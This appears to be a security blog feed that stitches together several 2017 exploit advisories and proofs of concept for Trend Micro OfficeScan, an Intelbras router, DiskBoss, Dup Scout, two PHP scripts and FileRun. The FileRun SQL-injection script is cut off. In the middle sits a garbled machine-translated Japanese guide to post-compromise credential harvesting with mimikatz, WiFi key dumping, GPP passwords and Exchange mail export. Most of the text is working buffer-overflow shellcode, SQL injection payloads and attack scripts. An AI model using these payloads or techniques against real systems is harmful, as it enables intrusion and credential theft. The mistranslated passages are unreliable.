[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.trendmicro.com
Product:
===========
OfficeScan
v11.0 and XG (12.0)*
Vulnerability Type:
===================
Unauthorized NT Domain Disclosure
Unauthorized PHP Information Disclosure
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
CVE Reference:
==============
CVE-2017-14085
Security Issue(s):
================
( NT Domain Disclosure )
Remote unauthenticated attackers who reach the TrendMicro OfficeScan XG application can query the networks NT domains.
NT enumeration is leaked by the web interface when it should not do so. Usually, you use NET commands so while this NT enumeration
is not high in severity, it should not return this information and especially to unauthorized users as it can aid in launching
further attacks.
( PHP Information Disclosure )
Remote unauthenticated attackers that can connect to TrendMicro OfficeScan XG application can query the PHP version and modules.
In 'analyzeWF.php" we see get_loaded_extensions() and phpversion() calls, but session or authentication check is made.
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version: '.phpversion());
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions: '.implode(', ',get_loaded_extensions()));
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion);
etc...
References:
===========
https://success.trendmicro.com/solution/1118372
Exploit/POC (NT Domain Disclosure):
=====================================
[root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe
* About to connect() to VICTIM-IP port 4343
* Trying VICTIM-IP... connected
< HTTP/1.1 200 OK
< Pragma: no-cache
< Content-Type: text/plain;charset=utf-8
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Thu, 01 Jun 2017 15:27:27 GMT
< Connection: close
< Content-Length: 510
{
"ERROR" : {
"ERROR_CODE" : 0
},
"RESPONSE" : {
"NODES" : [
{
"NAME" : "Avaya"
},
{
"NAME" : "Km-netprinters"
},
{
"NAME" : "Mshome"
},
{
"NAME" : "Printserver"
},
{
"NAME" : "MyDomain"
},
{
"NAME" : "Workgroup"
},
{
"NAME" : "Xpemb"
}
]
}
}
Exploit / POC (PHP Information Disclosure):
============================================
c:\> curl -k https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php
HTTP/1.1 200 OK
[INI_UPDATE_SECTION]
>>>> Start Anaylze WGF : 2017-06-02 15:58:26
[INFO] Current PHP version: 7.0.6
[INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter, hash, iconv, json, mcrypt, SPL, pcre, Reflection, session, standard, mysqlnd, tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML, xml, wddx, xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring, Phar, pdo_sqlite, soap, com_dotnet
[INFO] WGF version : 3.8
[INFO] WGF current wp in /path/to/widgetPool/config.php : wp2
[INFO] WGF is /path/to/widgets_new exists : true
[ERROR] C:\Windows\TEMP check read/write permissions : failed
To solved this problem please reference document here.
etc...
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=====================
Vendor Notification: June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863543873
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.trendmicro.com
Product:
========
OfficeScan
v11.0 and XG (12.0)*
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
Vulnerability Type:
===================
Host Header Injection
CVE Reference:
==============
CVE-2017-14087
Security Issue:
================
Host header injection issue as "db_controller.php" relies on $_SERVER['HTTP_HOST'] which can be spoofed by client, instead of $_SERVER['SERVER_NAME'].
In environments where caching is in place by making HTTP GET request with a poisoned HOST header webpages can potentially render arbitrary
links that point to a malicious website.
Exploit/POC:
=============
c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP"
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
==================================
Vendor Notification: June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN
150
# Date: 28/09/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: http://intelbras.com.br/
# Version: Intelbras Wireless N 150 Mbps - WRN 150
# Tested on: kali linux, windows 7, 8.1, 10
For more info:
http://whiteboyz.xyz/authentication-bypass-intelbras-wrn-150.html
URL VULN: http://10.0.0.1/
Download backup file:
Payload: curl --cookie "Cookie=admin:language=pt"
http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg
PoC:
#pip install requests
from requests import get
url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg"
#url do backup
header = {'Cookie': 'admin:language=pt'}
#setando o cookie no header
r = get(url, headers=header).text
print(r)
0x01情報コレクション
マシンを征服した後、マシンのパスワードをつかんだり、イントラネットをスキャンしたりしないでください。ネットワークにIDやその他のセキュリティ機器がある場合、アラームを引き起こし、許可を失う可能性があるためです。このセクションでは、主にイントラネットマシンが侵害されたときに情報を収集する方法の一部を紹介します。
1.1。 SPNSPN:サービスプリンシパル名。 Kerberosを使用すると、サーバーにSPNを登録する必要があります。したがって、イントラネットのSPNをスキャンして、イントラネットで登録サービスをすばやく見つけることができます。 SPNスキャンは、ポートスキャンなどの不確実性検出アクションを回避できます。主なツールは、setSpn、getUserspns.vbs、およびルベウスです。
a。 Windowsに付属のSETSPNツールを使用すると、通常のドメインユーザーの権限を実行できます。
setspn -t domain.com -q */*
上記のスクリーンショットでは、DNSサービスがDCServerマシンで実行されていることがはっきりとわかります。ネットワークにMSSQLが存在する場合、SPNスキャンを使用して対応する結果を取得することもできます。
b。 getUserSpns.vbsを使用して、SPN結果:を取得します
c。 Rubeusツールは、KerberosをテストするためにHarmj0yによって開発されたツールです。
Rubeusを使用して、どのドメインユーザーがSPNを登録したかを表示し、その後のKerberostingの準備もします。
1.2。ポート接続
NetStat -Anoコマンドを使用して機械通信情報を取得すると、通信ポートとIPに基づいて次の情報を取得できます。通信情報が入っているトラフィックの場合、Springboard/Fortress、管理者のPCソースIP、ローカルWebアプリケーションポートなどの情報を取得できます。通信情報が発信トラフィックである場合、機密ポート(Redis、MySQL、MSSQLなど)、APIポートなどの情報を取得できます。
1.3。構成ファイル
通常のWebアプリケーションには、対応するデータベースアカウントのパスワード情報が必要です。これは良い宝物です。
次のコマンドを使用して、パスワードフィールドを含むファイルを見つけることができます。
CD /Web
Str /s /m 'パスワード' *。 *
一般的に使用されるアプリケーションのデフォルトの構成パスは次のとおりです。
a。
tomcat:
catalina_home/conf/tomcat-users.xml
b。
apache:
/etc/httpd/conf/httpd.conf
c。
nginx:
/etc/nginx/nginx.conf
d。
WDCP:
/www/wdlinux/wdcp/conf/mrpw.conf
E、
mysql:
mysql \ data \ mysql \ user.myd
1.4。ユーザー情報
ネットワーク上のユーザー情報やその他の情報を収集し、ドメインコントロールの検索やドメインコントロールへの攻撃の起動など、高権威ユーザーに対するターゲット攻撃を実行できます。
a。ドメインユーザーと、通常のドメインユーザーの許可を確認してください。
ネットユーザー /ドメイン
b。ドメイン管理者を表示:
ネットグループ「ドメイン管理者」 /ドメイン
c。ドメインコントロールIP、通常はDNSとタイムサーバーをすばやく見つけます。
正味時間/ドメイン
nslookup -type=all_ldap._tcp.dc._msdcs.jumbolab.com
d。ドメインコントローラーを表示します。
ネットグループ「DomainControllers」 /ドメイン
1.5。イントラネットホストの発見
次のコマンドを使用して、イントラネットホストの発見を実現できます。
a。共有情報を表示:
ネットビュー
b。 ARPテーブルを確認してください:
ARP -A
c。ホストファイルを表示:
Linux3360
猫/など /ホスト
Windows:
タイプc: \ windows \ system32 \ drivers \ etc \ hosts
d。 DNSキャッシュを確認してください:
ipconfig /displaydns
e。もちろん、NMAPやNBTSCANなどのいくつかのツールを使用することも可能です。
1.6。セッションコレクション
管理者がログインしたマシンやログインしたマシンを検討するなど、ネットワーク上のセッションを収集すると、攻撃のターゲットがはるかに明確になります。
NetSessionEnum APIを使用して、どのユーザーが他のホストにログインしているかを確認できます。
API関連の紹介は次のとおりです。
https://docs.microsoft.com/en-us/windows/win32/api/lmshare/nf-lmshare-netsessionenum
例として、PowerShell Script PowerViewを使用してください。
a。ドメインユーザーが:にログインしたマシンを確認できます
b。また、ログインしたマシンのユーザーを確認することもできます。
他のツールとAPIは似ています。上記の情報を入手した後、発見されたドメイン管理またはドメイン管理にログインしたマシンを攻撃できます。これらのマシンを取得できる限り、ドメインコントロールにログインする対応する権限を持つことができます。
1.7。証明書コレクション
マシンを削除した後、できるだけ情報を収集する必要があります。以下は、パスワードを保存するために一般的に使用されるいくつかのソフトウェアのレジストリアドレスです。アルゴリズムに従って保存されたアカウントパスワードを復号化できます。
たとえば、リモート接続資格情報:
cmdkey/list
Navicat:
mysql
hkey_current_user \ software \ premiumsoft \ navicat \ servers \ y接続名
Mariadb
hkey_current_user \ software \ premiumsoft \ navicatmariadb \ servers \ y接続名
mongodb
hkey_current_user \ software \ premiumsoft \ navicatmongodb \ servers \ y接続名
Microsoft SQL
hkey_current_user \ software \ premiumsoft \ navicatmssql \ servers \ y接続名
オラクル
hkey_current_user \ software \ premiumsoft \ navicatora \ servers \ y接続名
postgreSql
hkey_current_user \ software \ premiumsoft \ navicatpg \ servers \ y接続名
sqlite
hkey_current_user \ software \ premiumsoft \ navicatsqlite \ servers \ y接続名
securecrt:
xp/win2003
c: \ documents and settings \ username \ application data \ vandyke \ config \ sessions
win7/win2008以上
c: \ uses \ username \ appdata \ roaming \ vandyke \ config \ sessions
Xshell 5xShell:
%userprofile%\ documents \ netsarang \ xshell \ sessions
Xshell 6
%userprofile%\ documents \ netSarang Computer \ 6 \ Xshell \ Sessions
hkcu \ software \ martin prikryl \ winscp 2 \ sessionswinscp:
realvnc
hkey_local_machine \ software \ realvnc \ vncserver
パスワード
tightVnc
hkey_current_user \ software \ tightvnc \ server値
パスワードまたはPasswordViewonly
Tigervnc
hkey_local_user \ software \ tigervnc \ winvnc4
パスワード
ultravnc
c: \ program files \ ultravnc \ ultravnc.ini
passwdまたはpasswd2
1.8。 DPAPIVNC:
Windows 2000以降MicrosoftがリリースしたDPAPIは、データ保護アプリケーションプログラミングインターフェイス(DPAPI)と呼ばれます。それらは、暗号化関数CryptProtectDataとそれぞれ復号化関数CryptunProtectDataを提供します。
その範囲の行動範囲には、以下が含まれ、これらに限定されません。
Outlookクライアントパスワード
Windowscredentialの資格情報
Chromeによって保存されたパスワード資格情報
InternetExplorerパスワード資格情報
DPAPIで使用される暗号化タイプは対称暗号化であり、キーを格納するファイルはマスターキーファイルと呼ばれ、そのパスは一般に%appData%\ Microsoft \ Protect \ {sid} \ {guid}です。ここで、{sid}はユーザーのセキュリティ識別子であり、{guid}はマスターキー名です。ユーザーのパスワード/ハッシュまたはドメインバックアップキーを使用してマスターキーを復号化し、DPAPIによって暗号化されたデータを復号化できます。
関連する紹介は次のとおりです。
https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection
侵入では、Mimikatzを使用して自動データの復号化を実現できます。
a。 Chromeパスワードを復号化する:
Mimikatz DPAPI:3360CHROME /IN: '%localAppData%\ Google \ chrome \ user \ user \ default \ login data' /unprotect
mimikatz vault:3360cred /patchb、資格情報を復号化する:
信頼関係は、ドメインを接続する橋です。 1つのドメインが他のドメインとの信頼関係を確立する場合、2つのドメインは必要に応じて互いに管理できるだけでなく、ネットワーク全体のファイルやプリンターなどのデバイスリソースを割り当てることができ、異なるドメイン間でネットワークリソースを共有および管理できるようにします。 1.9。ドメイントラスト
ドメインの信頼を表示:
nltest /domain_trusts
上記の結果は、2つのドメインchild.jumbolab.comとjumbolab.comが両方向に信頼されていることを示しています。
1.10。ドメイン伝送
ドメイン伝送の脆弱性がある場合、ドメイン名解像度レコードを取得できます。分析レコードが利用可能になった後、ネットワーク環境をさらに理解することができます。たとえば、wwwによって分析されたIPセグメントはDMZエリアにある場合があり、メールで分析されたIPセグメントはコアエリアなどにある場合があります。
Windows:
nslookup -type=ns domain.com
nslookup
サーバーdns.domain.com
LS domain.com
DIG @DNS.DOMAIN.COM AXFR DOMAIN.COM
1.11。 DNSレコードのLinuxを取得:
ネットワーク上のDNSレコードを収集すると、一部のマシンやWebサイトをすばやく見つけることができます。一般的なツールには、DNSCMDとPowerViewが含まれます。
a。 Windows Serverでは、DNSCMDツールを使用してDNSレコードを取得できます。
DNSレコードを取得します:
DNSCMD。 /ゾーンプリントjumbolab.com
DNSCMD。 /enumrecords jumbolab.com。
b。 Windows Non-Windowsサーバーマシンでは、PowerViewを使用して取得できます。
Import-Module PowerView.ps1
get -dnsrecord -zoneName jumbolab.com
1.12。 WI-FI
次のコマンドを使用して、接続されたWiFiパスワードを取得します。
for /f 'skip=9トークン=1,2デリム=:'%i in( 'netsh wlan show profiles')do @echo%j | findstr -i -v echo | netsh wlan showプロファイル%j key=clear
1.13。 gpp
グループポリシーを配布する場合、GPP構成用のXMLファイルがドメインSYSVOLディレクトリで生成されます。グループポリシーの構成時にパスワードが入力された場合、暗号化されたアカウントパスワードが存在します。これらのパスワードは、多くの場合、管理者のパスワードです。
XMLのパスワードはAESによって暗号化され、キーはMicrosoftによって開示されています。
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1ffa45dd4bbe?redirectedfrom=msdn
関連するスクリプトを使用して、次のような復号化できます。
https://raw.githubusercontent.com/powershellmafia/powersploit/master/exfiltration/get-gpppassword.ps1
ドメインユーザーログインスクリプトは、ドメインユーザーにも敏感なファイルがあるディレクトリに存在します。
\\ domain \ netlogon
1.14。シートベルト
シートベルトツールを使用して、自動化された情報収集を行うことができます。Googleの履歴、ユーザーなどに限定されない情報が収集されています。
Chromeのアクセス履歴がある場合、ユーザーがアクセスするいくつかの内部サイトのドメイン名/IPを知ることができ、イントラネット資産リソースの効率を改善できます。
1.15。ブラッドハウンド
Bloodhoundを使用して、ユーザー、コンピューター、組織構造、最速の攻撃方法など、自動化された情報収集を行うことができます。ただし、自動化はアラームを意味します。この脆弱性が自動化された情報を収集すると、イントラネットデバイスで多数のアラームが生成され、必要に応じて使用されます。
埋め込む:
Sharphound.exe -cすべて
実行後、20200526201154_BLOODHOUNDに似た名前のZIP圧縮パッケージが生成されます。
Bloodhoundをインポートした後、視覚分析を行うことができます。
最も一般的に使用されるものは、ドメインコントロールを攻撃する最速の方法を見つけることです。
下の図に示すように、ハンドユーザーを取得すると、ドメイン制御権限を取得できることがわかります。
1.16。交換
交換は通常、ドメイン内のコアロケーションにあります。これには、ドメイン制御サーバーにインストールされています。したがって、交換の関連する脆弱性にもっと注意を払う必要があります。交換機が削除された場合、ドメインコントロールはそれほど離れていません。
1.16.1電子メールユーザーパスワードブラスト
Rulerツールを使用して、OWAインターフェイスを爆破します。
./ruler - domain targetddomain.com brute - users/path/to/user.txt - passwords/path/to/passwords.txt
Ruler Toolは、OWAが爆破できるインターフェイスを自動的に検索します。
https://autodiscover.targetdomain.com/autodiscover/autodiscover.xml
他のEWSインターフェイスには、ブルートが強化されるリスクもあります。
https://mail.targetdomain.com/ews
1.16.2アドレス帳コレクション
メールアカウントのパスワードを取得した後、MailSniperを使用してアドレス帳を収集できます。アドレス帳を入手した後、上記のブラスト方法を使用して、弱いパスワードを試してみることができます。ただし、パスワードが多すぎないでください。ドメインユーザーにロックされる可能性があります。
get -globalAddressList -ExchHostName Mail.domain.com -Username Domain \ Username -Password fall2016 -outfile Global -Address -List.txt
1.16.3情報収集
Exchangeサーバーを削除した後、ユーザーや電子メールに限定されない情報収集を行うことができます。
すべてのメールユーザーを取得します:
get-mailbox
エクスポートメール:
newmailboxexportrequest -mailbox username -filepath( '\ localhost \ c $ \ test \ username.pst')
Webポートを介してエクスポートしてログインすることもできます。
https://mail.domain.com/ecp/
エクスポート後にレコードがあり、次のコマンドで表示できます。
get-mailboxexportrequest
エクスポートレコードを削除します:
remove -mailboxexportrequest -identity 'username \ mailboxexport' -confirm: $ false
0x02転送
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(PoC)
# Date: 28-09-2017
# Website: www.touhidshaikh.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
# 1. Click Server
# 2. Click Connect
# 3. In the "Share Name" field, paste the content of buffer.txt , And try
to connect.........BOOoom....
#
#========================================================================================================================
junk = "A"*1312
EIP = "B"*4 #EIP overwritten
b = junk+EIP+"D"*500
f = open('buffer.txt','w')
f.write(b)
f.close()
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.trendmicro.com
Product:
========
OfficeScan
v11.0 and XG (12.0)*
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
Vulnerability Type:
===================
Unauthorized Remote Memory Corruption
CVE Reference:
==============
CVE-2017-14089
Security Issue:
================
Remote unauthenticated attackers that can make connection the TrendMicro OfficeScan XG application targeting the "cgiShowClientAdm.exe"
process can cause memory corruption issues.
References:
===========
https://success.trendmicro.com/solution/1118372
Exploit/POC:
=============
import urllib,urllib2
from urllib2 import Request
print 'TrendMicro OfficeScan XG'
print 'Stack Memory Corruption POC'
print 'by hyp3rlinx\n'
IP="VICTIM-IP:4343"
PAYLOAD="A"*256
url = urllib2.Request('https://'+IP+'/officescan/console/html/cgi/cgiShowClientAdm.exe')
cookie="Cookie: serror=0; session_expired=no; FeatureEnableState=enableAntiBody@1|enableCCFR@1|enableCfw@1|enableDcs@1|enableSorting@0|enableSpy@1|enableVirus@1|HasAvAddSvc@1|installWSS@1|enableDLP@0|sqldbMode@0|enableIPv6@1|w2ksupport@0|; stamp=2231521137; timestamp=1497360567; DisabledIds=9999.; LogonUser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; ReadOnlyIds=8.56.; enableRba=1; key=16914202097564; session=666; LANG=en_US; PHPSESSID=WHATEVER123; lastID=34; lastTab=-1; theme=default; wf_CSRF_token=99999999999999999999999999999999; serror=0; retry=0; PHPSESSID=WHATEVERHERE; wf_CSRF_token=666; LANG=en_US; theme=default; lastID=33; lastTab=-1"
print '\nsending packetz... \n'+ cookie
##url.add_header("X-CSRFToken", "ee721b62aef83b017e8c86f52e38a411") #<============== X-CSRFToken IS NOT EVEN NEEDED!
url.add_header("Content-Type", "application/x-www-form-urlencoded; charset=utf-8")
url.add_header("Content-Length", "54")
url.add_header("Cookie ",cookie)
req=urllib2.urlopen(url)
res = urllib2.urlopen(req)
print res
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
====================
Vendor Notification: June 5, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer
Overflow
# Date: 29-09-2017
# Website: www.touhidshaikh.com
# Contact: https://github.com/touhidshaikh
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
# 1. right Click, click on Import Command
# 2. select evil.xml , Booom Calc POPED up.. ;)
#========================================================================================================================
import os,struct
import sys
#offset to eip
junk = "A" * (1560)
#JMP ESP (QtGui4.dll)
jmp1 = struct.pack('<L',0x651bb77a)
#NOPS
nops = "\x90"
#LEA EAX, [ESP+76]
esp = "\x8D\x44\x24\x4c"
#JMP ESP
jmp2 = "\xFF\xE0"
#Jump short 5
nseh = "\x90\x90\xEB\x05"
#POP POP RET
seh = struct.pack('<L',0x6501DE41)
#CALC.EXE pop shellcode
shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
# FINAL PAYLOAD
buf = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 90 + nseh + seh + nops
* 10 + shellcode
#FILE
file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf +
'\n</classify>'
f = open('evil.xml', 'w')
f.write(file)
f.close()
#GREETZ ----------
#Taushif(Brother)
#-----------------
# Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection
# Date: 2017-09-27
# Exploit Author: 8bitsec
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/4616/easy-blog-php-script
# Version: 1.3a
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-27
Product & Service Introduction:
===============================
A simple and easy to setup script that allows you to have your own basic blog that comes packed with professional features.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/article.php?id=8' AND 7160=7160 AND 'cbgz'='cbgz
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8' AND 7160=7160 AND 'cbgz'='cbgz
==================
8bitsec - [https://twitter.com/_8bitsec]
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: Dup Scout Enterprise v10.0.18 "Import Command" Buffer
Overflow
# Date: 29-09-2017
# Website: www.touhidshaikh.com
# Contact: https://github.com/touhidshaikh
# Vulnerable Software: Dup Scout Enterprise v10.0.18
# Vendor Homepage: http://www.dupscout.com
# Version: v10.0.18
# Software Link:
http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
# 1. right Click, click on Import Command
# 2. select evil.xml , Booom Calc POPED up.. ;)
#========================================================================================================================
import os,struct
#offset to eip
junk = "A" * (1560)
#JMP ESP (QtGui4.dll)
jmp1 = struct.pack('<L',0x651bb77a)
#NOPS
nops = "\x90"
#LEA EAX, [ESP+76]
esp = "\x8D\x44\x24\x4c"
#JMP ESP
jmp2 = "\xFF\xE0"
#Jump short 5
nseh = "\x90\x90\xEB\x05"
#POP POP RET
seh = struct.pack('<L',0x6501DE41)
#CALC.EXE pop shellcode
shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
# FINAL PAYLOAD
buf = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 90 + nseh + seh + nops
* 10 + shellcode
#FILE
file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf +
'\n</classify>'
f = open('evil.xml', 'w')
f.write(file)
f.close()
# Exploit Title: Real Estate MLM plan script v1.0 - 'srch' Parameter SQL Injection
# Date: 2017-09-28
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.mlmscript.in/
# Software Link: http://www.mlmscript.in/real-estate-mlm-script.html
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-28
Product & Service Introduction:
===============================
Real Estate MLM plan script we have used influential and having advanced secure database system here, that will help protect your user's sensitive details from outside attackers here we use newest technology to develop this Real Estate script.
Technical Details & Description:
================================
SQL injection on [srch] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/product-list.php?srch=search AND 3233=3233 AND 'NeVc'='NeVc
Parameter: srch (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: srch=search' AND 3233=3233 AND 'NeVc'='NeVc
==================
8bitsec - [https://twitter.com/_8bitsec]
#!/usr/bin/env python
# Exploit Title: FileRun <=2017.09.18
# Date: September 29, 2017
# Exploit Author: SPARC
# Vendor Homepage: https://www.filerun.com/
# Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2017.09.18
# Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0
# CVE : CVE-2017-14738
#
import sys,time,urllib,urllib2,cookielib
from time import sleep
print """
#===============================================================#
| |
| ___| | |
| \___ \ __ \ _ \ __ \ __| _ \ __| _` | |
| | | | __/ | | | __/ | ( | |
| _____/ .__/ \___|_| _|\__|\___|_| \__,_| |
| _| |
| |
| FileRun <= 2017.09.18 |
| BlindSQLi Proof of Concept (Post Authentication) |
| by Spentera Research (research[at]spentera.id) |
| |
#===============================================================#
"""
host = raw_input("[*] Target IP: ")
username = raw_input("[*] Username: ")
password = raw_input("[*] Password: ")
target = 'http://%s/?module=search§ion=ajax&page=grid' %(host)
delay=1
global cookie,data
def masuk(usr,pswd):
log_data = {
'username': usr,
'password': pswd
}
post_data = urllib.urlencode(log_data)
